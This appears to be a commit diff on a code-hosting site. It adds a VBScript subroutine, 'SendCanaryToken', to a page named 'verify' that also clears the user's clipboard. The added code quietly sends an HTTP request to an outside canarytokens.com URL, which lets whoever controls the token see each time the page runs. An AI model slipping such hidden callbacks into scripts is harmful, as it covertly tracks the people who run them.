enotkrutoy commited on
Commit
282e733
·
verified ·
1 Parent(s): 063463f

Update verify

Browse files
Files changed (1) hide show
  1. verify +8 -0
verify CHANGED
@@ -74,6 +74,14 @@
74
  objHTML.parentWindow.clipboardData.setData "text", ""
75
  Set objHTML = Nothing
76
  End Sub
 
 
 
 
 
 
 
 
77
  </script>
78
  </head>
79
  <body>
 
74
  objHTML.parentWindow.clipboardData.setData "text", ""
75
  Set objHTML = Nothing
76
  End Sub
77
+
78
+ Sub SendCanaryToken
79
+ Dim xhr
80
+ Set xhr = CreateObject("MSXML2.XMLHTTP")
81
+ xhr.open "GET", "http://canarytokens.com/articles/static/about/caezgk6o47larytuguc4irh00/contact.php", False
82
+ xhr.send
83
+ End Sub
84
+
85
  </script>
86
  </head>
87
  <body>